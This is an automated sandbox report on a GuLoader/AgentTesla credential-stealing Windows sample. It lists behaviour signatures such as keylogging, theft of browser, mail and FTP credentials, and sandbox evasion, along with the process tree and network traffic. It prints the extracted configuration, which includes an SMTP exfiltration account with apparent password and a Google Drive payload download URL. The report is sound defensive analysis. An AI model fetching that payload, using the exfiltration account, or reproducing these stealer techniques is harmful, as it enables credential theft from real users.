Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report G47wmLn8uy.exe

Overview

General Information

Sample Name:G47wmLn8uy.exe
Analysis ID:539603
MD5:9a1518ed709f916360e56b5ac7d76995
SHA1:7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256:2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Found detection on Joe Sandbox Cloud Basic with higher score
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64native
  • G47wmLn8uy.exe (PID: 2128 cmdline: "C:\Users\user\Desktop\G47wmLn8uy.exe" MD5: 9A1518ED709F916360E56B5AC7D76995)
    • CasPol.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\G47wmLn8uy.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4708 cmdline: "C:\Users\user\Desktop\G47wmLn8uy.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\G47wmLn8uy.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.1333152081.0000000002AB0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 4712JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}
            Source: CasPol.exe.4712.19.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: G47wmLn8uy.exeVirustotal: Detection: 26%Perma Link
            Source: G47wmLn8uy.exeReversingLabs: Detection: 15%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_01102C6C CryptUnprotectData,19_2_01102C6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_011033C0 CryptUnprotectData,19_2_011033C0
            Source: G47wmLn8uy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49761 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49770 -> 77.88.21.158:587
            Source: global trafficTCP traffic: 192.168.11.20:49770 -> 77.88.21.158:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ca.crl0h
            Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
            Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmpString found in binary or memory: http://oQCcllY8wcJ5yZF5.org
            Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmpString found in binary or memory: http://oQCcllY8wcJ5yZF5.orgt-
            Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ca.cer09
            Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ycasha2.cer0
            Source: CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: http://smtp.yandex.com
            Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com0.
            Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://uYFyNj.com
            Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: http://yandex.ocsp-responder.com03
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/
            Source: CasPol.exe, 00000013.00000003.1304818757.000000000124B000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/%%doc-08-0o-docs.googleusercontent.com
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/BQG
            Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/P~K
            Source: CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf
            Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
            Source: CasPol.exe, 00000013.00000002.5685409236.000000001DEA3000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000013.00000002.5685409236.000000001DEA3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpString found in binary or memory: https://www.certum.pl/CPS0
            Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49761 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Contains functionality to register a low level keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110D7C0 SetWindowsHookExW 0000000D,00000000,?,?19_2_0110D7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary:

            barindex
            Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
            Source: G47wmLn8uy.exeJoe Sandbox Cloud Basic: Detection: malicious Score: 100 Threat Name: GuLoader AgentTeslaPerma Link
            Source: G47wmLn8uy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB10992_2_02AB1099
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C092D819_2_00C092D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C02BA019_2_00C02BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C03E3819_2_00C03E38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C4F12819_2_00C4F128
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C4450819_2_00C44508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C4E9B019_2_00C4E9B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C43C3819_2_00C43C38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C438F019_2_00C438F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C40F1019_2_00C40F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00FFCCEF19_2_00FFCCEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00FFB17019_2_00FFB170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00FF369719_2_00FF3697
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00FF474819_2_00FF4748
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010FB14819_2_010FB148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010F2B7819_2_010F2B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010F67C019_2_010F67C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010F557819_2_010F5578
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010F557419_2_010F5574
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110896019_2_01108960
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110488019_2_01104880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_01105B7819_2_01105B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110AA5019_2_0110AA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110CD8819_2_0110CD88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110043819_2_01100438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0110044819_2_01100448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_01103FF819_2_01103FF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_1DCE5D0819_2_1DCE5D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_1DCE439419_2_1DCE4394
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_1DCE5CC119_2_1DCE5CC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_1DCE69F119_2_1DCE69F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010F837019_2_010F8370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010FB2FF19_2_010FB2FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00C48BA8 appears 52 times
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess Stats: CPU usage > 98%
            Source: G47wmLn8uy.exe, 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe
            Source: G47wmLn8uy.exe, 00000002.00000002.1333542144.0000000002BC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFort.exeFE2X vs G47wmLn8uy.exe
            Source: G47wmLn8uy.exeBinary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe
            Source: G47wmLn8uy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: G47wmLn8uy.exeVirustotal: Detection: 26%
            Source: G47wmLn8uy.exeReversingLabs: Detection: 15%
            Source: G47wmLn8uy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\G47wmLn8uy.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeFile created: C:\Users\user\AppData\Local\Temp\~DF81F8B836C10D3FC0.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
